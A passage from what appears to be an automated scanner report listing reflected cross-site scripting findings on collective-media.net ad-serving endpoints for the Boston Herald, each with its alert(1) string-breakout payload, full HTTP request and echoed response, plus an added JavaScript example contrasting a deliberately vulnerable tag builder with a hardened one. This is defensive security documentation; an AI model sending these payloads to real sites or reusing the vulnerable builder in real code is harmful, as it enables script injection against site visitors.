P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 482
Date: Sat, 29 Jan 2011 01:54:10 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:10 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience;sz=300x250;net=iblocal;ord=0.9691057777963579?&6976e'-alert(1)-'f30758ceea3=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.24. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.revinet.bostonherald/audience

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e60f'-alert(1)-'5ce6f5d2b63 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/iblocal.revinet.bostonherald/audience;sz=300x250;ord=0.9691057777963579?1e60f'-alert(1)-'5ce6f5d2b63 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 479
Date: Sat, 29 Jan 2011 01:54:07 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:07 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience;sz=300x250;net=iblocal;ord=0.9691057777963579?1e60f'-alert(1)-'5ce6f5d2b63;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.25. http://a.collective-media.net/adj/q1.bosherald/be_ent [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/be_ent

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f781'-alert(1)-'4331bbafcf8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald7f781'-alert(1)-'4331bbafcf8/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=2134060438? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 448
Date: Sat, 29 Jan 2011 01:54:33 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:33 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald7f781'-alert(1)-'4331bbafcf8/be_ent;sz=300x250;net=q1;ord=2134060438?;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.26. http://a.collective-media.net/adj/q1.bosherald/be_ent [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/be_ent

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e706b'-alert(1)-'511fd1c4838 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald/be_ente706b'-alert(1)-'511fd1c4838;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=2134060438? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 448
Date: Sat, 29 Jan 2011 01:54:34 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:34 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/be_ente706b'-alert(1)-'511fd1c4838;sz=300x250;net=q1;ord=2134060438?;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.27. http://a.collective-media.net/adj/q1.bosherald/be_ent [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/be_ent

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6398d'-alert(1)-'eda95b2ec1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=2134060438?&6398d'-alert(1)-'eda95b2ec1b=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 451
Date: Sat, 29 Jan 2011 01:54:31 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:31 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/be_ent;sz=300x250;net=q1;ord=2134060438?&6398d'-alert(1)-'eda95b2ec1b=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.28. http://a.collective-media.net/adj/q1.bosherald/be_ent [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/be_ent

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 116e0'-alert(1)-'9df7232d930 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=2134060438?116e0'-alert(1)-'9df7232d930 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 448
Date: Sat, 29 Jan 2011 01:54:25 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:25 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/be_ent;sz=300x250;net=q1;ord=2134060438?116e0'-alert(1)-'9df7232d930;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
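
Findings 4.17 through 4.28 are all the same sink: a path segment, the sz value or an arbitrary query-parameter name is concatenated into the single-quoted string literal that document.write() receives, and a payload of the form xxxxx'-alert(1)-'yyyyy closes the literal, runs as an expression, and reopens it. The block below is an added example written for this report; it is not code from the collective-media.net ad server (whose backend language is unknown; the script is plain JavaScript so it runs under Node without a browser). It models the response as a server-side string builder: a vulnerable version that reproduces the captured pattern, a hardened version that allow-lists the ad-unit name and the WIDTHxHEIGHT size and then encodes for both the URL and the JavaScript-string context, and a checker that reproduces the scanner's test (payload echoed verbatim, and its first quote landing inside an open single-quoted string). Function names, the UNIT_RE and SIZE_RE patterns, and the sample inputs are assumptions, modelled on finding 4.17.

```javascript
// Added example, not the ad server's own code. Models the a.collective-media.net
// /adj/ response seen in findings 4.17-4.28. Function names and validation
// rules are assumptions.

// Escape a value for use inside a single-quoted JavaScript string literal.
// Backslash, both quote characters, "<" / ">" and line terminators are the
// characters that can end the literal or close the enclosing <script> tag.
function jsStringEscape(s) {
  return String(s).replace(/[\\'"<>\u2028\u2029\r\n]/g, (c) =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Assumed allow-lists for the two values with a fixed shape: ad-unit names
// such as "cm.quadbostonherald" and sizes such as "300x250".
const UNIT_RE = /^[A-Za-z0-9._-]+$/;
const SIZE_RE = /^\d{1,4}x\d{1,4}$/;

// Vulnerable builder: raw concatenation of request data into the literal,
// the pattern the captured responses are consistent with.
function buildAdTagVulnerable(unit, sz, ord) {
  return "document.write('<scr'+'ipt language=\"javascript\" src=\"" +
    "http://k.collective-media.net/cmadj/" + unit + "/;sz=" + sz +
    ";net=cm;ord=" + ord + ";'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + '\">');";
}

// Hardened builder: reject what has a fixed format, URL-encode every piece
// that goes into the src URL, then escape the whole URL for the JS string
// context. encodeURIComponent alone is not enough: it leaves ' ( ) - intact,
// so the second layer is what actually neutralises the report's payload.
function buildAdTagHardened(unit, sz, ord) {
  if (!UNIT_RE.test(unit)) throw new Error('invalid ad unit');
  if (!SIZE_RE.test(sz)) throw new Error('invalid sz');
  const src = 'http://k.collective-media.net/cmadj/' +
    encodeURIComponent(unit) + '/;sz=' + encodeURIComponent(sz) +
    ';net=cm;ord=' + encodeURIComponent(ord) + ';';
  return "document.write('<scr'+'ipt language=\"javascript\" src=\"" +
    jsStringEscape(src) +
    "'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + '\">');";
}

// Reproduce the scanner's check: the payload must be echoed byte-for-byte,
// and its position on that line must be inside an open single-quoted string
// (an odd number of unescaped ' before it), so its own ' terminates the
// literal.
function breaksOutOfJsString(body, payload) {
  const at = body.indexOf(payload);
  if (at < 0) return false;
  const lineStart = body.lastIndexOf('\n', at) + 1;
  const before = body.slice(lineStart, at);
  let open = false;
  for (let i = 0; i < before.length; i++) {
    if (before[i] === '\\') { i++; continue; }   // skip escaped character
    if (before[i] === "'") open = !open;
  }
  return open && payload.includes("'");
}

// Constructed inputs, modelled on finding 4.17 (payload is the report's own).
const PAYLOAD = "14682'-alert(1)-'6bd835e8910";
const vulnBody = buildAdTagVulnerable('cm.quadbostonherald', PAYLOAD, '[timestamp]');
const safeBody = buildAdTagHardened('cm.quadbostonherald', '300x250', '12345');

console.log(breaksOutOfJsString(vulnBody, PAYLOAD)); // true
console.log(breaksOutOfJsString(safeBody, PAYLOAD)); // false
```

The ord value is deliberately left free-form in the hardened builder to show the second layer doing its job: the payload placed there survives encodeURIComponent unchanged but comes out of jsStringEscape as 14682\u0027-alert(1)-\u00276bd835e8910, which the browser decodes back to the original characters only after the string literal has been parsed, so it can no longer terminate it. The checker is a line-local heuristic, adequate for the one-line document.write() responses in this report, not a general JavaScript tokenizer.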

4.29. http://a.collective-media.net/adj/q1.bosherald/be_ent_fr [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/be_ent_fr

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc375'-alert(1)-'1c213697142 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosheraldbc375'-alert(1)-'1c213697142/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1194202561? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 451
Date: Sat, 29 Jan 2011 01:54:30 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:30 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.bosheraldbc375'-alert(1)-'1c213697142/be_ent_fr;sz=300x250;net=q1;ord=1194202561?;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.30. http://a.collective-media.net/adj/q1.bosherald/be_ent_fr [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/be_ent_fr

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c4bd'-alert(1)-'a4282fd2012 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald/be_ent_fr9c4bd'-alert(1)-'a4282fd2012;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1194202561? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 451
Date: Sat, 29 Jan 2011 01:54:32 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:32 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/be_ent_fr9c4bd'-alert(1)-'a4282fd2012;sz=300x250;net=q1;ord=1194202561?;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.31. http://a.collective-media.net/adj/q1.bosherald/be_ent_fr [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/be_ent_fr

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55cd8'-alert(1)-'c6144a53fa1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1194202561?&55cd8'-alert(1)-'c6144a53fa1=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 454
Date: Sat, 29 Jan 2011 01:54:29 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:29 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/be_ent_fr;sz=300x250;net=q1;ord=1194202561?&55cd8'-alert(1)-'c6144a53fa1=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.32. http://a.collective-media.net/adj/q1.bosherald/be_ent_fr [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/be_ent_fr

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c05fc'-alert(1)-'9211df7f8cc was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1194202561?c05fc'-alert(1)-'9211df7f8cc HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 451
Date: Sat, 29 Jan 2011 01:54:23 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:23 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/be_ent_fr;sz=300x250;net=q1;ord=1194202561?c05fc'-alert(1)-'9211df7f8cc;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.33. http://a.collective-media.net/adj/q1.bosherald/ent [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/ent

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 654f4'-alert(1)-'850b1958677 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

